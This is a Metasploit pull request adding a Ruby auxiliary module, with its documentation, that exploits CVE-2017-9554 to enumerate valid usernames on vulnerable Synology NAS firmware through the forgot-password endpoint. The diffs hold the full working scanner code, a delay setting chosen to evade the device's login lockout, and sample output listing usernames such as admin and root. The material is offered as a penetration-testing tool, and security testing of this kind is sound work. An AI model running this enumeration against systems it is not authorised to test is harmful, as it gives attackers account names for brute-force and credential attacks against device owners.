### PR TITLE
CVE-2017-9554 Synology Username Enumerator

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
@@ -5,6 +5,11 @@ for the forgot password URL. The Synology NAS will respond differently if a user
 present or not. These count as login attempts, and the default is 10 logins in 5min to
 get a permanent block.  Set delay accordingly to avoid this, as default is permanent.
 
+Vulnerable DSMs are:
+ * DSM 6.1 < 6.1.3-15152
+ * DSM 6.0 < 6.0.3-8754-4 
+ * DSM 5.2 < 5.2-5967-04
+
 Enumeration is case insensitive.
 
 To turn off Auto Block: Control Panel > Security > Auto Block.
@@ -17,6 +22,7 @@ The server responds with a JSON object and a 'msg' key.  The values translate as
 
  * msg 1 - means user can login to GUI
  * msg 2 - means user exists but no GUI login
+ * msg 3 - means feature disabled, or patched
  * msg 4 - means no user
  * msg 5 - means auto block is enabled and youre blocked. Default is 10 login attempts, and these
 

--- a/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
@@ -1,0 +1,70 @@
+## Vulnerable Application
+
+This module attempts to enumerate users on the Synology NAS by sending GET requests
+for the forgot password URL. The Synology NAS will respond differently if a user is
+present or not. These count as login attempts, and the default is 10 logins in 5min to
+get a permanent block.  Set delay accordingly to avoid this, as default is permanent.
+
+Enumeration is case insensitive.
+
+To turn off Auto Block: Control Panel > Security > Auto Block.
+
+To unblock: Control Panel > Security > Auto Block > Allow/Block List > Block List.
+
+### Responses
+
+The server responds with a JSON object and a 'msg' key.  The values translate as:
+
+ * msg 1 - means user can login to GUI
+ * msg 2 - means user exists but no GUI login
+ * msg 4 - means no user
+ * msg 5 - means auto block is enabled and youre blocked. Default is 10 login attempts, and these
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/synology_forget_passwd_user_enum```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```set delay [seconds]```
+  6. You should hopefully find some usernames
+
+## Options
+
+### Delay
+
+The delay in seconds between enumeration attempts.  Default lockout policy is 10 attempts in 5min,
+so this should avoid the lockout.  Default is `31`.
+
+### USER_LIST
+
+The username list to use, defaults to `data/wordlists/unix_users.txt`
+
+## Scenarios
+
+### DS412+ with DSM 5.2-5644 with auto block turned off
+
+  ```
+  [*] Processing syn_login.rb for ERB directives.
+  resource (syn_login.rb)> use auxiliary/scanner/http/synology_forget_passwd_user_enum
+  resource (syn_login.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (syn_login.rb)> set delay 0
+  delay => 0
+  resource (syn_login.rb)> run
+  [+] admin - admin group
+  [+] avahi - no mail or no priviege
+  [+] ftp - no mail or no priviege
+  [+] guest - no mail or no priviege
+  [+] lp - no mail or no priviege
+  [+] mysql - no mail or no priviege
+  [+] nobody - no mail or no priviege
+  [+] ntp - no mail or no priviege
+  [+] postfix - no mail or no priviege
+  [+] postgres - no mail or no priviege
+  [+] root - no mail or no priviege
+  [+] ROOT - no mail or no priviege
+  [+] http://2.2.2.2:5000/ - Users found: ROOT, admin, avahi, ftp, guest, lp, mysql, nobody, ntp, postfix, postgres, root
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```

--- a/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
@@ -12,9 +12,9 @@ Vulnerable DSMs are:
 
 Enumeration is case insensitive.
 
-To turn off Auto Block: Control Panel > Security > Auto Block.
+To turn off Auto Block: Control Panel (Advanced Mode) > Security > Auto Block.
 
-To unblock: Control Panel > Security > Auto Block > Allow/Block List > Block List.
+To unblock: Control Panel (Advanced Mode) > Security > Auto Block > Allow/Block List > Block List.
 
 ### Responses
 

--- a/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
@@ -40,7 +40,7 @@ The server responds with a JSON object and a 'msg' key.  The values translate as
 ### Delay
 
 The delay in seconds between enumeration attempts.  Default lockout policy is 10 attempts in 5min,
-so this should avoid the lockout.  Default is `31`.
+so this should avoid the lockout.  Default is `36`.
 
 ### USER_LIST
 

--- a/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md
@@ -7,7 +7,7 @@ get a permanent block.  Set delay accordingly to avoid this, as default is perma
 
 Vulnerable DSMs are:
  * DSM 6.1 < 6.1.3-15152
- * DSM 6.0 < 6.0.3-8754-4 
+ * DSM 6.0 < 6.0.3-8754-4
  * DSM 5.2 < 5.2-5967-04
 
 Enumeration is case insensitive.

--- a/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
+++ b/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
           false, 'File containing users, one per line',
           File.join(Msf::Config.data_directory, 'wordlists', 'unix_users.txt')
         ]),
-        OptInt.new('DELAY', [true, 'Seconds delay to add to avoid lockout', 31])
+        OptInt.new('DELAY', [true, 'Seconds delay to add to avoid lockout', 36])
       ]
     )
   end

--- a/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
+++ b/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Synology Forget Password  User Enumeration Scanner',
+      'Description'    => %q{
+        This module attempts to enumerate users on the Synology NAS
+        by sending GET requests for the forgot password URL.
+        The Synology NAS will respond differently if a user is present or not.
+        These count as login attempts, and the default is 10 logins in 5min to
+        get a permanent block.  Set delay accordingly to avoid this, as default
+        is permanent.
+      },
+      'Author'         => [
+        'h00die', # msf module
+        'Steve Kaun' # POC
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '43455' ],
+          [ 'CVE', '2017-9554' ],
+          [ 'URL', 'https://www.synology.com/en-global/security/advisory/Synology_SA_17_29_DSM' ]
+        ],
+      'DisclosureDate' => 'Jan 5 2011'))
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptString.new('TARGETURI', [true, 'The path to users Synology Web Interface', '/']),
+        OptPath.new('USER_FILE', [false, 'File containing users, one per line',
+          File.join(Msf::Config.data_directory, 'wordlists', "unix_users.txt")]),
+        OptInt.new('DELAY', [true, 'Seconds delay to add to avoid lockout', 31])
+      ])
+  end
+
+  def run_host(ip)
+    @users_found = {}
+
+    unless File.readable?(datastore['USER_FILE'])
+      fail_with(Failure::BadConfig, 'USER_FILE can not be read')
+    end
+    users = File.new(datastore['USER_FILE']).read.split
+    users.each do |user|
+      do_enum(user)
+      vprint_status("Delaying #{datastore['DELAY']}s") if datastore['DELAY'] > 0 # dont flood the prompt
+      Rex::sleep(datastore['DELAY'])
+    end
+
+    if(@users_found.empty?)
+      print_status("#{full_uri} - No users found.")
+    else
+      print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
+      report_note(
+      :host => rhost,
+      :port => rport,
+      :proto => 'tcp',
+      :sname => (ssl ? 'https' : 'http'),
+      :type => 'users',
+      :vhost => vhost,
+      :data => {:users =>  @users_found.keys.join(", ")}
+    )
+    end
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def do_enum(username)
+    begin
+      uri = normalize_uri(target_uri.path)
+
+      vprint_status("Attempting #{username}")
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'webman', 'forget_passwd.cgi'),
+        'method'  => 'GET',
+        'vars_get' => {
+          'user' => username
+        }
+      })
+      unless res
+        print_error('Connection to host refused')
+        fail_with(Failure::Unreachable, 'Connection to host refused')
+      end
+      j = res.get_json_document
+      if j['msg'] == 5
+        fail_with(Failure::Disconnected, 'You have been locked out.  Retry later or increase DELAY')
+      end
+      if j['msg'] == 2 || j['msg'] == 1
+        print_good("#{username} - #{j['info']}")
+        @users_found[username] = :reported
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: (ssl ? 'https' : 'http'),
+          proof: res.body
+        )
+      end
+      # msg 1 means user can login to GUI
+      # msg 2 means user exists but no GUI login
+      # msg 4 means no user
+      # msg 5 means auto block is enabled and youre blocked. Default is 10 login attempts, and these
+      #     count as lgin attempts.
+    rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError
+      print_error('Connection to host refused')
+      fail_with(Failure::Unreachable, 'Connection to host refused')
+    rescue Timeout::Error, Errno::EPIPE
+      fail_with(Failure::Unreachable, 'Connection issue')
+    end
+
+  end
+end

--- a/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
+++ b/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
@@ -19,6 +19,10 @@ class MetasploitModule < Msf::Auxiliary
         These count as login attempts, and the default is 10 logins in 5min to
         get a permanent block.  Set delay accordingly to avoid this, as default
         is permanent.
+        Vulnerable DSMs are:
+          DSM 6.1 < 6.1.3-15152
+          DSM 6.0 < 6.0.3-8754-4
+          DSM 5.2 < 5.2-5967-04
       },
       'Author'         => [
         'h00die', # msf module
@@ -116,6 +120,9 @@ class MetasploitModule < Msf::Auxiliary
       if j['msg'] == 5
         fail_with(Failure::Disconnected, 'You have been locked out.  Retry later or increase DELAY')
       end
+      if j['msg'] == 3
+        fail_with(Failure::UnexpectedReply, 'Device patched or feature disabled')
+      end
       if j['msg'] == 2 || j['msg'] == 1
         print_good("#{username} - #{j['info']}")
         @users_found[username] = :reported
@@ -128,6 +135,7 @@ class MetasploitModule < Msf::Auxiliary
       end
       # msg 1 means user can login to GUI
       # msg 2 means user exists but no GUI login
+      # msg 3 means not supported/disabled/patched
       # msg 4 means no user
       # msg 5 means auto block is enabled and youre blocked. Default is 10 login attempts, and these
       #     count as lgin attempts.


### PR DESCRIPTION
This module exploits CVE-2017-9554.  Synology devices with a vuln firmware answer differently to a valid username than an invalid one, thus allowing us to enumerate valid users.

As documented, these requests count as login attempts, and the default lockout policy is 10 attempts in 5min, thus we have a 31 sec delay since the lockout is permanent.

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/http/synology_forget_passwd_user_enum`
- [x] `set rhosts/delay`
- [x] **Verify** you enumerate some users
- [x] **Document** looks good

  ```
  [*] Processing syn_login.rb for ERB directives.
  resource (syn_login.rb)> use auxiliary/scanner/http/synology_forget_passwd_user_enum
  resource (syn_login.rb)> set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  resource (syn_login.rb)> set delay 0
  delay => 0
  resource (syn_login.rb)> run
  [+] admin - admin group
  [+] avahi - no mail or no priviege
  [+] ftp - no mail or no priviege
  [+] guest - no mail or no priviege
  [+] lp - no mail or no priviege
  [+] mysql - no mail or no priviege
  [+] nobody - no mail or no priviege
  [+] ntp - no mail or no priviege
  [+] postfix - no mail or no priviege
  [+] postgres - no mail or no priviege
  [+] root - no mail or no priviege
  [+] ROOT - no mail or no priviege
  [+] http://2.2.2.2:5000/ - Users found: ROOT, admin, avahi, ftp, guest, lp, mysql, nobody, ntp, postfix, postgres, root
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  ```

